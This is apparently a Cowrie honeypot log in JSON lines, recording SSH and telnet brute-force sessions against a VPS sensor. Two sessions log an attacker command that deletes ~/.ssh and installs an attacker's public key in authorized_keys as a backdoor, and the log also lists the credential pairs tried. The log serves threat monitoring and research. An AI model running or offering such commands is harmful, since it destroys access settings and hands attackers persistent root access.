{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:29:59.176560Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:29:59.337238Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:29:59.338079Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56958,"dst_ip":"1.2.3.4","dst_port":22,"session":"52381fe21dba","protocol":"ssh","message":"New connection: 212.227.235.229:56958 (1.2.3.4:22) [session: 52381fe21dba]","sensor":"my-vps","timestamp":"2025-09-08T13:29:59.439014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:29:59.440087Z","src_ip":"212.227.235.229","session":"52381fe21dba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:29:59.547417Z","src_ip":"212.227.235.229","session":"52381fe21dba"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:30:00.139678Z","src_ip":"212.227.235.229","session":"52381fe21dba"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:01.246328Z","src_ip":"212.227.235.229","session":"52381fe21dba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56962,"dst_ip":"1.2.3.4","dst_port":22,"session":"44355e687877","protocol":"ssh","message":"New connection: 212.227.235.229:56962 (1.2.3.4:22) [session: 44355e687877]","sensor":"my-vps","timestamp":"2025-09-08T13:30:01.344375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:30:01.345145Z","src_ip":"212.227.235.229","session":"44355e687877"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:30:01.451962Z","src_ip":"212.227.235.229","session":"44355e687877"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:30:02.435226Z","src_ip":"212.227.235.229","session":"44355e687877"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:02.539952Z","src_ip":"212.227.235.229","session":"44355e687877"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:02.542418Z","src_ip":"212.227.235.229","session":"7851238f9024"}
{"eventid":"cowrie.session.closed","duration":12.796728134155273,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:04.004802Z","src_ip":"212.227.125.160","session":"02ad7de83b65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":22980,"dst_ip":"1.2.3.4","dst_port":23,"session":"de8e1990a7bc","protocol":"telnet","message":"New connection: 212.227.125.160:22980 (1.2.3.4:23) [session: de8e1990a7bc]","sensor":"my-vps","timestamp":"2025-09-08T13:30:04.241120Z"}
{"eventid":"cowrie.session.closed","duration":12.785084962844849,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:08.687731Z","src_ip":"212.227.235.229","session":"927ff7b9c131"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56520,"dst_ip":"1.2.3.4","dst_port":23,"session":"5628eae3ff60","protocol":"telnet","message":"New connection: 212.227.235.229:56520 (1.2.3.4:23) [session: 5628eae3ff60]","sensor":"my-vps","timestamp":"2025-09-08T13:30:08.936630Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53950,"dst_ip":"1.2.3.4","dst_port":22,"session":"729aa63a3e94","protocol":"ssh","message":"New connection: 212.227.235.229:53950 (1.2.3.4:22) [session: 729aa63a3e94]","sensor":"my-vps","timestamp":"2025-09-08T13:30:13.298022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:30:13.298802Z","src_ip":"212.227.235.229","session":"729aa63a3e94"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:30:13.422143Z","src_ip":"212.227.235.229","session":"729aa63a3e94"}
{"eventid":"cowrie.login.failed","username":"client","password":"abc123","message":"login attempt [client/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:30:13.955261Z","src_ip":"212.227.235.229","session":"729aa63a3e94"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:15.080731Z","src_ip":"212.227.235.229","session":"729aa63a3e94"}
{"eventid":"cowrie.session.closed","duration":12.760993957519531,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:17.002025Z","src_ip":"212.227.125.160","session":"de8e1990a7bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":24410,"dst_ip":"1.2.3.4","dst_port":23,"session":"22cd76face70","protocol":"telnet","message":"New connection: 212.227.125.160:24410 (1.2.3.4:23) [session: 22cd76face70]","sensor":"my-vps","timestamp":"2025-09-08T13:30:17.211997Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39590,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0b1d5f9ee78","protocol":"ssh","message":"New connection: 134.199.174.250:39590 (1.2.3.4:22) [session: d0b1d5f9ee78]","sensor":"my-vps","timestamp":"2025-09-08T13:30:19.872053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:30:19.872931Z","src_ip":"134.199.174.250","session":"d0b1d5f9ee78"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:30:20.188900Z","src_ip":"134.199.174.250","session":"d0b1d5f9ee78"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123abc","message":"login attempt [pi/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:30:21.573214Z","src_ip":"134.199.174.250","session":"d0b1d5f9ee78"}
{"eventid":"cowrie.session.closed","duration":12.76768970489502,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:21.704253Z","src_ip":"212.227.235.229","session":"5628eae3ff60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56811,"dst_ip":"1.2.3.4","dst_port":23,"session":"9e210d3f8def","protocol":"telnet","message":"New connection: 212.227.235.229:56811 (1.2.3.4:23) [session: 9e210d3f8def]","sensor":"my-vps","timestamp":"2025-09-08T13:30:21.917412Z"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:23.002618Z","src_ip":"134.199.174.250","session":"d0b1d5f9ee78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39002,"dst_ip":"1.2.3.4","dst_port":22,"session":"a32f5d32210f","protocol":"ssh","message":"New connection: 212.227.235.229:39002 (1.2.3.4:22) [session: a32f5d32210f]","sensor":"my-vps","timestamp":"2025-09-08T13:30:23.400506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:30:23.402560Z","src_ip":"212.227.235.229","session":"a32f5d32210f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:30:23.625160Z","src_ip":"212.227.235.229","session":"a32f5d32210f"}
{"eventid":"cowrie.login.failed","username":"supervisor","password":"12345678","message":"login attempt [supervisor/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T13:30:25.175791Z","src_ip":"212.227.235.229","session":"a32f5d32210f"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:26.402583Z","src_ip":"212.227.235.229","session":"a32f5d32210f"}
{"eventid":"cowrie.session.closed","duration":12.772043943405151,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:29.983981Z","src_ip":"212.227.125.160","session":"22cd76face70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":17732,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf2f8767e562","protocol":"telnet","message":"New connection: 212.227.125.160:17732 (1.2.3.4:23) [session: cf2f8767e562]","sensor":"my-vps","timestamp":"2025-09-08T13:30:30.189403Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11731,"dst_ip":"1.2.3.4","dst_port":23,"session":"c3cd4ca7715b","protocol":"telnet","message":"New connection: 212.227.235.229:11731 (1.2.3.4:23) [session: c3cd4ca7715b]","sensor":"my-vps","timestamp":"2025-09-08T13:30:33.747815Z"}
{"eventid":"cowrie.session.closed","duration":12.776039600372314,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:34.693386Z","src_ip":"212.227.235.229","session":"9e210d3f8def"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57131,"dst_ip":"1.2.3.4","dst_port":23,"session":"2becef6a5132","protocol":"telnet","message":"New connection: 212.227.235.229:57131 (1.2.3.4:23) [session: 2becef6a5132]","sensor":"my-vps","timestamp":"2025-09-08T13:30:34.941531Z"}
{"eventid":"cowrie.session.closed","duration":12.771497011184692,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:42.960834Z","src_ip":"212.227.125.160","session":"cf2f8767e562"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":19146,"dst_ip":"1.2.3.4","dst_port":23,"session":"70f32f4f5609","protocol":"telnet","message":"New connection: 212.227.125.160:19146 (1.2.3.4:23) [session: 70f32f4f5609]","sensor":"my-vps","timestamp":"2025-09-08T13:30:43.260766Z"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":48057,"dst_ip":"1.2.3.4","dst_port":22,"session":"f94c78319206","protocol":"ssh","message":"New connection: 49.247.35.31:48057 (1.2.3.4:22) [session: f94c78319206]","sensor":"my-vps","timestamp":"2025-09-08T13:30:46.088308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:30:46.092329Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.session.closed","duration":12.41402006149292,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:46.161756Z","src_ip":"212.227.235.229","session":"c3cd4ca7715b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:30:46.429497Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":14149,"dst_ip":"1.2.3.4","dst_port":23,"session":"d311f6bbf687","protocol":"telnet","message":"New connection: 212.227.235.229:14149 (1.2.3.4:23) [session: d311f6bbf687]","sensor":"my-vps","timestamp":"2025-09-08T13:30:46.541496Z"}
{"eventid":"cowrie.session.closed","duration":12.74229907989502,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:47.683736Z","src_ip":"212.227.235.229","session":"2becef6a5132"}
{"eventid":"cowrie.login.success","username":"root","password":"admin2","message":"login attempt [root/admin2] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:30:47.714878Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57447,"dst_ip":"1.2.3.4","dst_port":23,"session":"15ba12d2e142","protocol":"telnet","message":"New connection: 212.227.235.229:57447 (1.2.3.4:23) [session: 15ba12d2e142]","sensor":"my-vps","timestamp":"2025-09-08T13:30:47.958401Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:30:48.420269Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:30:48.421131Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:30:48.422202Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:30:48.752453Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:30:49.441461Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:30:49.442237Z","src_ip":"49.247.35.31","session":"f94c78319206"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:30:49.771659Z","src_ip":"49.247.35.31","session":"f94c78319206"}
